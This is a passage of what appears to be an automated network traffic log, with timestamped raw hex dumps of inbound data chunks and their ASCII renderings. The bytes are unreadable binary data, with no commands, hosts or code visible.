                                                                              2023-10-26 07:45:58 UTC13INData Raw: b4 e9 a2 e9 e5 ee 9e ac 0e 05 18 b2 5a c7 fb a0 ea cb b8 bb eb c9 c7 c9 b8 99 12 bb c1 f0 9a 2a c2 82 7f 9e 04 53 8e 6c ec 83 a8 45 12 a7 3e 7f 65 33 9e b1 b5 89 e3 2d cb 08 98 49 2e f2 a2 4d e5 79 d6 42 72 6b ad cf 07 22 6a 2d f8 c3 9b 2a 83 e3 3a b1 d4 f9 31 e6 e2 f3 a5 58 62 eb df e9 7c e2 7b 6f cd e5 6f a8 b8 b4 d7 9a 46 7d 62 31 4b 55 6a 2b e6 60 12 6e 80 d2 5f 26 18 cc 5a a5 0b e8 15 3a cb 8a aa 43 93 1f a7 75 f8 1e 85 35 26 2e 75 3d b2 fa 9f a6 29 ef e1 a8 49 e9 82 cf 4a 04 74 9c 27 d2 7f e6 81 f6 ad 7e ad 30 0d 01 63 ce 0f 77 6e dd 6b e8 50 69 ef 1d ca 98 d9 12 c9 76 dd 1b bf b7 6d af d0 b3 fa 15 65 72 9c 2a ab bc 86 c6 ff 07 47 fc 44 7a 70 ed 50 e9 37 48 57 c5 88 63 3c fb 9b ec 63 eb dd 1f 07 a5 40 98 1a 1a 20 42 fa 6f 9d cf 63 7b e6 af 01 22 ad
                                                                              Data Ascii: Z*SlE>e3-I.MyBrk"j-*:1Xb|{ooF}b1KUj+`n_&Z:Cu5&.u=)IJt'~0cwnkPivmer*GDzpP7HWc<c@ Boc{"
                                                                              2023-10-26 07:45:58 UTC14INData Raw: 95 74 95 2d da 12 b0 48 19 4f 6d ad cc d2 b5 24 1a 8e 12 89 18 44 07 2a 19 6e 5e 86 89 ce 16 5f f3 7e cd cb 34 c7 c7 4c 03 37 b6 4d 03 ae f8 91 31 e6 75 c4 84 4c 8d c4 19 83 26 d5 7e fd 39 62 de be 4e f4 81 bb b2 8d a8 ef 90 42 de d1 ea cf 87 bd 87 c1 88 7a 2e 68 77 53 30 7d 31 a4 22 39 ab c5 17 c6 c9 25 c4 61 d8 cd cc 48 4a 18 cf 4d 2a 8e f1 48 4d 97 4c 9c 3f e0 47 ab e3 8c 71 4e 0d 50 5c 5f 51 84 cc dc cf 2e 54 e7 67 cd 2c c6 5f 66 b1 63 d9 8d e7 48 88 a7 94 d7 31 48 cf 94 d3 2d 66 e6 c9 81 47 12 da 70 ff 9d e3 e5 08 e6 4f 33 6a d0 fe 10 ba a6 aa 98 d8 b8 4e 76 62 a7 92 1f 5d 5e f1 1e 5d 24 19 66 65 cf 72 a6 17 a1 1f 9d 95 09 61 6a 8e 62 39 fb 67 e2 70 41 f6 e3 00 2b f0 10 f2 6b c3 50 47 f3 a9 0c 86 8d 49 41 42 e2 5c 58 f5 97 ca 7b 90 9d 35 d5 16 1b c4
                                                                              Data Ascii: t-HOm$D*n^_~4L7M1uL&~9bNBz.hwS0}1"9%aHJM*HML?GqNP\_Q.Tg,_fcH1H-fGpO3jNvb]^]$ferajb9gpA+kPGIAB\X{5
                                                                              2023-10-26 07:45:58 UTC16INData Raw: ba 99 37 1b c9 f4 a9 b5 b7 96 6e e9 b1 22 5d 23 49 2e b9 27 89 a9 de 0a 87 5c d5 ec 7e 41 7d 75 9a c8 08 06 a7 85 4d 06 c7 d3 80 ed 2d 52 6e 70 5e 51 6e d1 82 53 cf e9 81 53 30 0d 84 b4 74 01 f1 87 61 53 38 38 d5 f5 76 dc d1 e9 dd b9 82 61 e6 36 36 d3 6f ef 5c 57 9c 52 50 4f ea b3 19 b2 1a d5 68 12 1e ba 4f 36 68 76 18 26 ea 6d 71 2e e0 73 a2 5c f8 b2 d4 14 78 ef 7b f8 26 52 5c 15 e5 36 65 a9 83 16 5f fd 7b aa e4 43 75 4f 63 48 61 1e da 3b 6a 03 a7 1b 3a b9 cc 04 fb f3 48 fe 82 74 eb 73 bb 2f dc 58 69 2c 36 cd 1e d2 38 9b e6 a9 61 98 e8 c2 d4 c2 f5 cb e1 f0 82 b4 11 1c 95 67 7d 78 18 ea 09 0d b7 96 d2 e9 d3 12 5d 53 99 4c de 1f 99 a9 da 0d 87 68 d2 f9 a0 16 5f f4 90 b7 a1 32 d9 51 48 15 53 8e 28 94 c0 a7 47 f1 7f b7 db 33 18 90 6c 1d 79 8f 6c a3 c0 51 7c
                                                                              Data Ascii: 7n"]#I.'\~A}uM-Rnp^QnSS0taS88va66o\WRPOhO6hv&mq.s\x{&R\6e_{CuOcHa;j:Hts/Xi,68ag}x]SLh_2QHS(G3lylQ|
                                                                              2023-10-26 07:45:58 UTC17INData Raw: 01 98 a9 91 60 14 bf 70 d8 6f c5 b7 3c c5 fa fb 35 1c 52 61 17 5c cb da 56 80 e9 54 68 dd 01 66 77 53 da dc 12 63 9c e6 3f d9 b9 a4 b6 4b c9 cf c2 f5 e3 5d e4 62 3a a6 35 28 c0 f2 c6 6a f6 57 52 f1 31 f3 31 55 7a e0 c0 d1 fa 68 a9 54 0c ce b3 be d4 79 69 66 39 c9 e7 d5 03 66 f3 c3 6e 18 c0 d9 00 de 47 c6 23 00 a9 59 6d 34 57 cd df 8c a4 c5 6a e4 fb 51 62 44 3c bb 49 da 9b af 6f 77 0e 62 00 b7 06 23 b7 77 55 7e 64 e2 16 23 fd d1 5a ce 5a 7f b1 63 89 77 e7 55 64 6f 27 1e 3f aa 7d 28 26 a2 c0 b3 89 c9 68 61 d2 af 46 4b aa be 55 6f 4f 77 a9 65 48 d8 be a9 c9 60 6d ac a9 86 9d 66 66 da 46 90 63 f3 6d 20 25 81 5e 19 f2 71 4f 50 e2 3d a0 39 03 6a 63 6f 26 ee 84 5f f2 c9 3f dd ac 79 05 92 ea d5 54 68 0c a7 fa c6 a3 cb 19 9f 36 62 48 c8 d5 52 46 82 b6 d7 51 90 6d
                                                                              Data Ascii: `po<5Ra\VThfwSc?K]b:5(jWR11UzhTyif9fnG#Ym4WjQbD<Iowb#wU~d#ZZcwUdo'?}(&haFKUoOweH`mffFcm %^qOP=9jco&_?yTh6bHRFQm
                                                                              2023-10-26 07:45:58 UTC18INData Raw: 2a f2 08 06 3d 25 f1 99 63 bd 32 52 05 d8 5e ef 2d fd 4b 68 52 20 12 e9 04 c4 68 86 db 51 6f 08 05 19 e5 1e 4d 61 45 3e 98 25 71 98 88 66 cf cd e1 27 68 ef a0 c6 18 51 53 f1 59 95 d9 2d aa 46 a3 59 5e 15 b0 48 2b 9e 07 b7 4e 9f 11 d7 78 e6 b3 f2 1e 14 57 5c 09 aa b6 99 e4 46 5c f3 1a 36 b1 b4 e6 94 59 c4 1a 5e c4 da 62 9a 19 f0 f3 6b 49 54 fa ea a8 fc 08 07 f9 9a 98 9c 6b 02 10 2e 3b 4f 1a 2a 97 19 03 22 86 4f 30 bf fc d9 44 77 ed 28 35 de 87 c7 be 07 a1 f2 66 fd 3e ff 78 72 51 ff 0a 09 7d 59 dd 44 ec c4 f4 c5 a3 e9 74 36 30 6d c4 ab 90 5a bc 62 95 2b 84 74 c2 f8 c5 40 0a 74 f7 14 b7 e9 78 68 ae 0c 5f ff df eb 44 c2 d3 5e 5a ad 6d 53 da 46 3c 4e bd 0c f9 28 40 8e 22 69 66 36 1c df 74 a2 0c 6f cf e1 cc 04 b9 35 02 8d c3 be fc 7e 34 82 ff a5 71 69 d0 63 0d
                                                                              Data Ascii: *=%c2R^-KhR hQoMaE>%qf'hQSY-FY^H+NxW\F\6Y^bkITk.;O*"O0Dw(5f>xrQ}YDt60mZb+t@txh_D^ZmSF<N(@"if6to5~4qic
                                                                              2023-10-26 07:45:58 UTC20INData Raw: e6 d5 e2 db 3f 0b 8d 0b c5 12 4e b1 24 c1 2d f4 05 52 88 cd 3f 6f 87 1e f9 92 88 3f e9 8a a4 a8 69 a2 8a c4 5c c2 a9 82 5f 67 1b 45 65 94 83 62 34 e1 3e 92 b7 69 a4 3d 78 3e 19 e4 54 a0 3d ec b5 f7 ec 44 ed 65 6b 9e 1d 6e 68 ce 2d 3e bd 2b d1 96 7e 44 dd da 1d 9e 47 66 c2 0d 61 e1 0d 9e d7 f7 7e 04 6f 6f 0d 00 74 7a f7 ea 73 a2 9a cb fc 49 c4 54 5e 68 74 ed 0c a4 db 1f 23 e0 59 b9 90 63 e3 5a 26 a0 48 78 c9 85 a8 3b 8b 70 92 78 e0 73 be d0 8d f7 90 aa ed 11 b9 66 69 4d 82 a7 ad ce 88 6d ae 52 47 7d b3 54 48 66 45 67 fb 2e f7 9c 45 50 89 b2 b3 fd b2 d8 5a 99 dd 72 a1 8d 68 5e 16 44 43 d0 81 71 63 38 42 61 07 52 e8 0a e4 85 87 9c 6d 29 36 ed c3 07 78 9c 07 7c 49 98 f8 f4 53 6f dc 01 38 f4 6e 0b 12 38 c9 82 80 d7 44 18 b9 43 36 43 53 c8 b3 b1 9e 91 4b 25 84
                                                                              Data Ascii: ?N$-R?o?i\_gEeb4>i=x>T=Deknh->+~DGfa~ootzsIT^ht#YcZ&Hx;pxsfiMmRG}THfEg.EPZrh^DCqc8BaRm)6x|ISo8n8DC6CSK%
                                                                              2023-10-26 07:45:58 UTC21INData Raw: 37 62 3b f0 37 1d 59 6c 91 aa 48 3d b6 67 55 1c 67 4a 8c a5 c5 1e a7 6a 1a c1 3a 42 69 60 48 33 43 42 94 24 47 36 81 1c 09 63 22 d2 8c 48 22 1b 74 0f 62 43 69 60 76 ca a2 47 18 d2 b9 ae cf bd e7 06 1d 1b 62 da 2f ed 13 23 59 e7 97 1f 09 a8 9c db 71 77 c6 60 89 9b 1e 3e e6 4c aa bf c3 9f 9a 80 1c 09 c3 84 9f 49 74 2e 83 1b 66 03 7a a8 8b 04 c9 48 3a 1e c9 e9 ad 73 3e cd c9 7d 92 d1 e2 1f 3a 65 79 f4 79 7f 01 87 c4 16 89 15 79 88 99 5e 7b 71 1c 36 88 da 37 32 30 ef 66 55 39 65 ce 5e a6 f1 11 40 18 49 8f af 80 e4 be 0b 14 2f 00 bf 5e e2 e7 e7 74 43 c9 e9 70 1a 76 4a 09 15 e2 68 60 6a e0 6c c5 ec 52 5e 56 54 77 a4 9e e9 d5 59 02 07 ad 35 1e 19 da 69 b0 62 9c 59 51 4a 45 aa d1 d9 87 75 44 e6 44 f4 72 2e ce 0d d0 27 8e 35 97 d9 e5 a9 11 63 8b 3d 2f f7 e1 fd 88
                                                                              Data Ascii: 7b;7YlH=gUgJj:Bi`H3CB$G6c"H"tbCi`vGb/#Yqw`>LIt.fzH:s>}:eyyy^{q6720fU9e^@I/^tCpvJh`jlR^VTwY5ibYQJEuDDr.'5c=/
                                                                              2023-10-26 07:45:58 UTC22INData Raw: f4 80 ab 6a e5 86 e0 62 e4 87 ef a2 ef 82 ee 48 2a 74 b0 34 53 41 f3 65 05 82 ad e1 f2 41 15 7d f9 49 fa 61 ed 84 e8 a2 c5 25 ce 96 8c 18 14 8a 09 89 e7 36 c0 e7 65 b2 a5 24 d6 31 c8 2b b4 a1 f4 1f a0 2d 6b 25 74 dc ce f2 90 73 01 16 fc b9 23 f9 14 99 c6 d7 09 c4 41 f4 14 9c c2 a4 f4 d4 fc 17 ca c9 4e 89 a4 b1 2a 4e 78 a4 cc ef db 26 c3 5f 54 cb 75 88 6a 53 6f 2d 63 82 0a dc c1 76 71 c2 f3 a4 02 8b ba 89 2a 8f b4 08 0b 9a ed 24 ee 3e 19 82 da a6 6d 54 f7 2c cb a1 f4 57 f6 aa e8 7a b8 60 69 77 51 d3 a9 17 12 70 55 42 d4 81 ef 7e e2 aa f4 7f f7 79 72 49 c6 d2 52 5a c8 aa e1 d7 52 91 ea d3 a5 5b ed 60 fb 6f ce 38 be a9 17 09 d0 8c 3c f8 30 7c ea 68 9e 55 d8 87 c1 6e 6a 53 c1 29 aa eb 63 ce 0f 9c 94 26 02 74 00 32 e9 7f e9 60 dd 37 fd cf 71 d8 dd e9 5d aa 94
                                                                              Data Ascii: jbH*t4SAeA}Ia%6e$1+-k%ts#AN*Nx&_TujSo-cvq*$>mT,Wz`iwQpUB~yrIRZR[`o8<0|hUnjS)c&t2`7q]
                                                                              2023-10-26 07:45:58 UTC24INData Raw: d7 e2 3f b7 c8 2c c2 60 27 bb 82 d1 99 74 84 9f e0 ff 47 69 78 0a 47 73 58 8e 0b 6e 0f c3 ef c2 e6 e2 93 a1 24 34 e2 8a 6a b2 51 a0 12 b0 69 73 ca a1 62 06 a0 5c 97 32 88 14 3c 4e 68 a8 3d 6a 62 4c ef b3 c5 b1 e1 66 4e ab 57 2a 3c c7 61 aa ea ec 27 56 d9 3e 34 15 6f bd a1 a9 ac a7 d4 84 f8 74 a9 85 67 aa ec ee 6d f0 c9 ed 23 e4 40 88 d8 f4 69 e6 1e e6 ad de ab 34 e2 f9 a5 2f 92 0b 38 bd 6e a6 22 cc 6f af a1 cb 81 6e 42 df a3 c4 5c bd 46 5a 98 0b c2 83 ac f0 fa c6 ac 13 c8 6a 78 06 48 b3 2b d3 64 54 09 ff a3 17 4c 5f a3 2a 16 59 7c d1 f8 b4 75 cb b1 9f 42 9b d7 f3 78 4d 63 ef 94 e9 8d 92 49 9c 87 9a c6 2a 81 ed ab 0a 92 d7 eb 26 38 04 62 51 23 9c e6 76 f6 82 c4 12 72 7f 02 ed 2c 90 b9 16 e1 34 9e d4 b7 fa ca dd e2 34 6d 28 1f 94 c2 e8 a6 c0 5a a9 d7 40 a1
                                                                              Data Ascii: ?,`'tGixGsXn$4jQisb\2<Nh=jbLfNW*<a'V>4otgm#@i4/8n"onB\FZjxH+dTL_*Y|uBxMcI*&8bQ#vr,44m(Z@
                                                                              2023-10-26 07:45:58 UTC25INData Raw: 86 e4 4e ac 9d cd bd 2f b4 34 e7 3f 9f c1 bc 7f a2 aa 38 b8 78 c6 6a 6a 52 7c 12 3e d0 a2 b1 f7 14 79 b2 40 b8 c9 0a ba ff 9d ae 9b 14 5a 61 4d b2 a1 fc 97 fb 71 ac 79 15 eb de 77 d3 72 30 14 43 27 6a e5 9b e6 ca f7 b4 df 93 45 94 22 fe c5 1c b8 4c d8 84 57 ea 01 15 45 58 69 9c f3 76 0a d4 57 71 d6 a6 a1 4a a9 70 e7 c4 7e 20 22 8b fe 01 0e 6b 47 d2 aa 8a 18 71 0d b3 d0 06 23 00 a2 f4 b6 a6 12 a6 26 a6 5a c2 d1 0a 7b cb af 2c 37 e0 c2 33 f9 16 b8 99 57 d4 64 aa 16 1b 58 51 e6 54 a2 aa 66 1c 90 0e 6a f3 8e fd 61 fd 79 ff 6b 0c 62 d8 78 19 62 3a 81 bc 7f 4b 87 ef 89 eb 1e 85 f8 2a 58 47 eb c1 77 40 26 74 f6 79 88 34 2f 8c ed f1 2b 11 3d 63 f8 74 ee f1 6b 4a 62 12 4d e0 e9 1c fe 5d f0 f3 98 04 4b 39 13 6b 82 aa 56 49 14 a5 57 19 b7 6a d8 07 9f 99 76 35 fb fe
                                                                              Data Ascii: N/4?8xjjR|>y@ZaMqywr0C'jE"LWEXivWqJp~ "kGq#&Z{,73WdXQTfjaykbxb:K*XGw@&ty4/+=ctkJbM]K9kVIWjv5
                                                                              2023-10-26 07:45:58 UTC26INData Raw: a8 94 98 63 73 b8 f7 0f ae e8 61 14 3a 26 44 20 9a 8a ee f4 52 2b 5a a9 6a 5d 1d fb fb 8e b8 e2 e3 ea 68 d4 01 6c e9 7e a2 59 c1 a6 69 4a c6 7c 84 ba 7a be 91 4f 4c 48 a5 71 cf d0 08 cb ab 8c cd 44 71 e4 e7 76 f6 74 82 f0 39 a2 84 e9 a6 16 98 13 5a 40 8f ba 57 09 6b 49 bd b8 f2 1a f8 5e 62 ad 2a 50 62 5c 8f fd 1f c0 0a 14 31 8f 1a ab 91 2a 72 43 4e 9e d0 34 e9 01 20 7f 03 b2 eb 81 c6 4a 79 f2 9d 00 94 d5 b4 46 38 b4 2a 24 38 c3 81 e9 ae cf 30 6b ff 69 f2 fa 5a 7e 3f 1b 1e 83 5a c7 e6 96 e2 74 1f a0 df 2a 2d 10 27 92 58 98 c2 f2 ca 80 a4 51 e4 14 f1 44 f1 6f 71 5e ac a5 19 38 38 54 5d e5 f7 d1 70 de 14 41 0f 6b 76 c6 27 c6 91 81 42 e9 ec c0 47 89 58 6c bd e6 26 00 15 55 38 74 e2 e5 38 0f a6 4f 15 16 7e d8 37 f4 ec 7a 87 9e ef be 79 60 bb e2 2e 19 39 53 78
                                                                              Data Ascii: csa:&D R+Zj]hl~YiJ|zOLHqDqvt9Z@WkI^b*Pb\1*rCN4 JyF8*$80kiZ~?Zt*-'XQDoq^88T]pAkv'BGXl&U8t8O~7zy`.9Sx
                                                                              2023-10-26 07:45:58 UTC28INData Raw: ba 37 f4 7b bf 70 41 eb b1 78 f0 0f ec 50 4b d2 08 c4 7f 8f eb a4 18 bb 04 a4 34 d1 f8 10 37 62 d2 89 0d 39 8c 1d 47 bf 2e b9 17 2a 73 d8 10 62 d8 d7 3f 77 bb 67 a4 fb e6 60 dd f6 2a 93 fe c2 bc 52 6f 63 85 58 40 b7 06 03 cf af 6a 7d 4d f6 ba 6c 74 a8 bf 9a 2f f6 6a f8 0d 3d 08 66 6d 7f e5 17 2d b9 ea 8e 17 46 93 77 7a 62 42 d8 ff 4e 90 26 36 85 a2 2a 94 63 14 1c 49 d4 71 85 15 64 0a af e2 d1 48 38 e6 21 eb e6 0b ba 80 38 80 90 43 78 75 79 48 0c 1a 3d 66 74 e8 31 06 1b 16 e2 00 0a b8 72 28 b8 b3 bd 0a 07 7e 6b 9b 40 c2 81 a3 69 fc 41 99 37 6d 89 63 0b f4 ef 0a 92 00 a0 02 69 3f 32 da 7b d9 7a 3a d2 6b e7 30 e1 d4 bf e3 dd fa c8 2a 21 12 73 13 56 17 44 12 5f 08 0d b3 17 00 4b 00 6a 9f 60 a8 da b4 4f 94 56 87 91 9a 77 1a b4 00 2c 5d d3 8a 1f 74 dc 89 e6 94
                                                                              Data Ascii: 7{pAxPK47b9G.*sb?wg`*RocX@j}Mlt/j=fm-FwzbBN&6*cIqdH8!8CxuyH=ft1r(~k@iA7mci?2{z:k0*!sVD_Kj`OVw,]t
                                                                              2023-10-26 07:45:58 UTC29INData Raw: 56 e7 78 0d b6 10 89 0a 57 3d ec 88 11 8b e2 e7 c5 a7 fa d5 2c b4 58 79 41 8a e9 2a 81 f3 3a 1b 4a 33 cd 0a d8 89 21 00 f1 0a 42 66 6d e8 35 e8 4b 6f 82 46 b4 92 c2 ea f9 04 31 05 a0 64 dd 0e c7 a0 81 6b ab 98 e1 9a 99 f3 4a 6a 78 9e 5c d6 62 55 f4 d1 50 f0 92 8d 1f 41 1d 47 f8 6f 79 16 d8 94 c4 ea 5b f7 38 61 56 e2 f5 fa 77 44 e1 06 a2 6e 7f 49 f8 f2 c8 97 c3 9f 32 c3 2b 94 c9 4e c0 b3 21 ad c9 52 63 59 9f 77 72 0a ee 84 02 d0 5f 33 64 c1 94 5e 22 6b 67 9f 8b e6 56 54 84 07 2c c6 87 55 c9 3b 62 2f 26 d4 b2 c0 09 14 84 02 1d cc f5 dc 47 a5 b6 97 57 44 c2 9b 3c da 7c b2 37 5c 1b c0 c1 f3 73 96 ed 05 62 ca 0c 48 fb db 2c f4 7c 4b 65 b8 6a 6a 3e cb e2 fa 8f 7f b2 e8 68 ba 0f c0 9b 14 1e ab 62 cb 5f 2c 3b 9a 34 6b 60 54 c0 91 12 34 e2 09 6e 16 8e 01 a1 b2 fe
                                                                              Data Ascii: VxW=,XyA*:J3!Bfm5KoF1dkJjx\bUPAGoy[8aVwDnI2+N!RcYwr_3d^"kgVT,U;b/&GWD<|7\sbH,|Kejj>hb_,;4k`T4n
                                                                              2023-10-26 07:45:58 UTC30INData Raw: 62 09 c4 7e 74 50 79 d8 9b 10 63 14 fb 85 3a d4 2b 82 0a 52 15 89 01 3b 7f b0 e8 f7 49 11 37 10 d4 72 0b 5c 0e 74 ca 20 15 37 0e 38 36 f9 39 8a 4a db 2e b8 98 f4 8e b8 03 6d 3e 6b a0 84 69 58 e0 a6 12 98 53 fb 62 b8 73 e2 09 68 c2 ec 86 b8 fc ca 97 8e f2 d1 aa 70 6d 79 b0 fb 13 82 98 2f f8 0a 6f 35 a5 21 da 32 bd e5 8b ba fa 2c 4b 79 cb fb 6a 5b ca 81 ea aa 16 f3 e9 ba f2 40 d8 49 a6 e1 2a d6 11 2d cd e0 74 d4 6f 99 b4 92 0a 30 c8 53 04 b1 34 83 c5 17 3c 8c ad d0 74 22 17 28 74 87 2a 1a ca 81 d7 f0 57 f7 f2 77 cb 64 54 d6 63 0c 73 04 c7 7b db 9b 6e 3b 29 18 84 3b 2b 33 e3 41 52 73 f6 7f 9c 7e 93 32 7a 5f 47 2a b3 48 8b 82 e2 6f 74 03 d0 2f a5 e1 e6 7a c6 25 48 4a 4e 00 af 57 45 d3 ea 68 52 86 9b 43 f0 7a 49 e0 74 8b 5a f8 75 f6 7b 5d 6b c8 e8 37 3d b8 0f
                                                                              Data Ascii: b~tPyc:+R;I7r\t 7869J.m>kiXSbshpmy/o5!2,Kyj[@I*-to0S4<t"(t*WwdTcs{n;);+3ARs~2z_G*Hot/z%HJNWEhRCzItZu{]k7=
                                                                              2023-10-26 07:45:58 UTC32INData Raw: 30 15 33 82 37 fa 83 e2 da 8d 67 48 eb 0d e2 83 ca d8 b1 61 5a 16 6c f8 ca 10 b4 45 93 7a f1 62 42 75 a8 95 f7 37 84 8d 29 b8 9e 05 02 38 13 84 0c 18 b2 0c fe 71 94 a2 01 a9 e4 93 37 38 54 5f 9a 3e e4 df 24 27 0e 49 f7 7f a7 21 f8 4b f3 a4 11 38 93 86 a1 e1 d5 aa aa 63 a8 e1 88 98 f0 b8 26 1d d9 bc 72 78 ab 4e e7 67 70 80 5a b4 b5 9d aa 89 c4 61 ea e1 60 ed 65 f5 67 42 eb 78 00 63 14 54 03 f4 cb 25 5c 7a ca be 95 db fe 2d ef 90 45 f9 94 75 06 58 37 61 5c 58 44 7b f7 77 fd 88 02 5e 04 82 f8 58 5c 8b f0 5a 3f f0 40 d8 d4 07 05 9d 7f 64 0e 90 8d d4 3b fc d2 61 c9 97 82 a2 58 f1 79 ca 13 aa 90 5b ea 31 1e 82 03 99 e7 ad a6 68 34 90 ee d7 01 22 7c 01 34 b4 e8 1e b3 74 58 58 4c ea a0 61 f0 c1 e1 16 bb 7a ca 37 e2 c9 71 da 14 02 12 8a c2 da 2a 90 94 65 43 d3 c9
                                                                              Data Ascii: 037gHaZlEzbBu7)8q78T_>$'I!K8c&rxNgpZa`egBxcT%\z-EuX7a\XD{w^X\Z?@d;aXy[1h4"|4tXXLaz7q*eC
                                                                              2023-10-26 07:45:58 UTC33INData Raw: b6 1c db 09 2e d4 61 14 e9 90 ef 25 6b f8 ba 60 53 5f e2 0c 62 3a a2 5b d9 26 83 0a 01 b8 cb ea d7 0c 25 57 db fe 9d 2f 18 25 12 76 67 04 e6 ec 0a f6 2d 4f 38 62 94 bb 17 f3 df 19 3c d1 f0 cd 6f 8f 7f 7a 5d f0 2a f3 fe bd 00 eb b7 13 08 91 f5 96 be 79 8c 64 e1 72 d8 f4 7b 2f 24 ce 95 1e 22 7c dc 6f 18 60 23 7c e9 fd b8 e3 62 aa e1 a2 0d 74 73 87 e0 78 66 b6 74 b3 dd 77 a0 b4 7b 08 f8 94 c6 ef 28 1a d3 8b 18 76 e2 02 ca 1d 5b 0b ec 36 52 2a b0 6d 02 8b 65 94 3c 8c 7a 2e 27 ff f1 25 db ea 67 9c f4 cf 65 23 57 e8 f0 3b e6 5b f6 bc 81 c5 22 f6 0c e6 00 53 92 69 af 58 54 6d 74 3f a5 58 78 67 f5 3a 66 78 6e 73 f3 3c 07 71 ae 6c 2c c7 03 47 93 2a e6 97 1e 60 5e 54 e2 0d 7b 5e 22 0b b3 6e 6b 43 2e 6a bb 99 f7 e4 d9 99 57 d4 63 56 30 38 82 2e 6d 5e a2 18 8b 4e 35
                                                                              Data Ascii: .a%k`S_b:[&%W/%vg-O8b<oz]*ydr{/$"|o`#|btsxftw{(v[6R*me<z.'%ge#W;["SiXTmt?Xxg:fxns<ql,G*`^T{^"nkC.jWcV08.m^N5
                                                                              2023-10-26 07:45:58 UTC34INData Raw: 63 dd 2a b8 65 f6 41 ad 13 c2 42 d4 c8 61 3a 0e c4 5e bc 57 43 97 12 07 e0 21 ea 66 42 f6 76 60 3c c9 c4 af 34 df bf f4 bb 7e 6a 88 49 59 d8 f8 5b e2 4a 68 c6 2f e7 1d 42 f3 e8 2c 0b bb cb c9 34 56 45 5f 7a e2 e4 63 73 63 a1 ea 14 b2 8a 9d 7b d0 ea 57 00 e2 cf a9 57 a2 c1 ae ef de 9c 5e 32 d1 41 38 04 49 ab 17 3f 2e 5e 88 14 fa 0e 55 4c 02 2b f8 c7 d2 ea 7f 78 ed 62 66 a5 ea ce 56 3d 11 6b 18 07 34 d7 a2 c9 79 e5 6c 51 74 2c 6b db ea 2a 46 7f 42 06 62 f4 b1 74 9c 78 a8 f4 4f f1 3f 3a 73 67 c4 f5 aa 74 c2 c7 7f d6 9a a1 d8 f4 51 ad 8c 73 7e 6f 01 83 83 8b c8 4b d3 ff 6b dd e3 14 99 c9 d1 df 4b 54 62 fa 1e 1e cc e6 94 d0 f2 c8 7a 96 64 6a 63 c8 b5 88 d8 61 79 8c b8 0e a2 d7 a3 95 c1 d8 6a 44 a2 0e 71 c1 e9 62 60 b4 81 46 6b e8 ed 06 a5 34 81 7d 01 0d af 80
                                                                              Data Ascii: c*eABa:^WC!fBv`<4~jIY[Jh/B,4VE_zcsc{WW^2A8I?.^UL+xbfV=k4ylQt,k*FBbtxO?:sgtQs~oKkKTbzdjcayjDqb`Fk4}
                                                                              2023-10-26 07:45:58 UTC36INData Raw: 56 3a 9b e4 f9 59 8f 18 d5 ea f7 a3 74 ef 68 b7 aa e8 02 0a b2 81 24 2e 42 57 21 23 90 d8 14 14 63 14 2f c2 a1 5c 68 29 74 af cb e1 e1 96 18 f4 e4 01 a9 87 e0 8a 23 6c a2 54 df e1 63 d6 fc 58 57 ea e8 b5 e2 8c 30 80 7a b7 a1 fb 7a 4f dd b4 95 ea d6 43 22 ea 66 4a bb 67 51 f4 83 45 d2 ef 7f 54 db 63 c2 56 d8 79 5e eb 1b 41 35 06 a0 34 8a a3 e2 85 aa 8a f6 a3 fd 2a 71 af 03 bb 17 42 fc ea 5e 41 e1 ae 64 51 c6 21 42 0f 36 6b dd 15 e0 62 70 74 c2 ea 6a fc 75 a4 67 dc 6c 25 65 cb ca 3c 78 a1 41 41 2d 55 33 eb 61 4c fe e8 52 45 11 59 d3 7a 42 ab 95 9c 59 b2 e0 5a 62 0b 46 0c 6d fa 4b f3 77 d1 e2 c6 30 0d 1a 14 82 01 fc cb c5 e9 41 8e 9d 82 8c c8 f0 42 30 a4 be eb 36 08 e2 2a 2f 13 f0 d8 e0 6d 08 e6 f7 b0 9c 60 0a 95 83 2a 44 93 d0 f1 f7 a3 e2 6a 25 af 74 0f fa
                                                                              Data Ascii: V:Yth$.BW!#c/\h)t#lTcXW0zzOC"fJgQETcVy^A54*qB^AdQ!B6kbptjugl%e<xAA-U3aLREYzBYZbFmKw0AB06*/m`*Dj%t
                                                                              2023-10-26 07:45:58 UTC37INData Raw: 3b 60 d1 10 a9 97 f0 ba b6 d8 54 01 c7 47 74 a3 b9 02 d6 57 d3 be aa 7e 88 d8 f4 f8 6a 26 fa 93 3d 52 34 22 d9 5a c7 fd 8b 08 94 57 c8 2e 4d 82 bb 58 cd 46 5d eb 9c 22 eb d0 e4 ca 96 1e 79 33 66 59 94 77 af 6f cc 61 c6 a8 e4 3d 56 44 a5 15 79 18 f0 0c 74 6d 86 3a 4b 7c 5b 80 a7 51 88 e2 da ce 54 aa aa 7b 9a d4 5b de 12 60 29 4f 07 a5 8a 3f 53 25 11 6c d4 d5 ec 59 22 3b 99 5d b3 8e d2 7e 2c 82 9e 48 54 6d 8a d8 aa 3e 0e 48 bd 1d cb 72 e6 a8 0a f8 1e 9f d1 26 85 28 6b 3a 1d 52 fd ae 76 f8 6c 5d 4f a2 c4 8d fb 05 bc 23 4b 67 ca 15 34 82 99 4c 49 d9 e8 f7 28 31 eb 9b b9 9c 50 ee 14 6b d7 36 28 a2 dd 12 94 9d 7a f8 d2 4b 04 b8 34 10 cf 21 5b ca 7d 1c b4 59 c6 f8 53 a2 e9 2a ef 46 e0 74 a3 de 6e 78 31 d2 88 f0 de 3b d2 2a 6f 22 6b 2d b3 bd 96 92 85 ca 4a 5f 9f
                                                                              Data Ascii: ;`TGtW~j&=R4"ZW.MXF]"y3fYwoa=VDytm:K|[QT{[`)O?S%lY";]~,HTm>Hr&(k:Rvl]O#Kg4LI(1Pk6(zK4![}YS*Ftnx1;*o"k-J_
                                                                              2023-10-26 07:45:58 UTC38INData Raw: a5 b1 bb ca f7 de f5 df 8f 9f a9 ae c1 01 c3 8a 33 e2 26 df 58 99 1d f3 3a 51 e3 db d6 d0 a8 3c 58 74 8c 85 18 74 bb 3d f2 f3 21 a0 12 4d 62 60 1e 21 d7 20 98 13 c6 4a 8e b1 3d cb 28 b6 49 fa 17 41 73 ee f8 94 df 41 8d 5a 64 aa 25 7b 3c d3 57 9d 74 f1 3c dd 9e 5f 68 f4 62 43 22 d1 a2 4a 38 54 c9 77 aa 5f bb 8a f0 53 ca 13 90 d4 77 05 72 40 b8 2b a7 74 a2 1b 48 d2 bd 2a f8 63 32 85 f7 78 6c a5 e8 23 82 0a 7a 4c 66 aa 85 1d e5 ca 23 03 36 4f 18 0a a6 51 e6 f4 3e b0 3f d1 cd b9 a7 d3 66 9f 21 69 7b 20 a8 14 aa a9 65 c0 01 d1 f1 cf e1 ef 80 b9 37 eb 89 2e 2b eb 17 f4 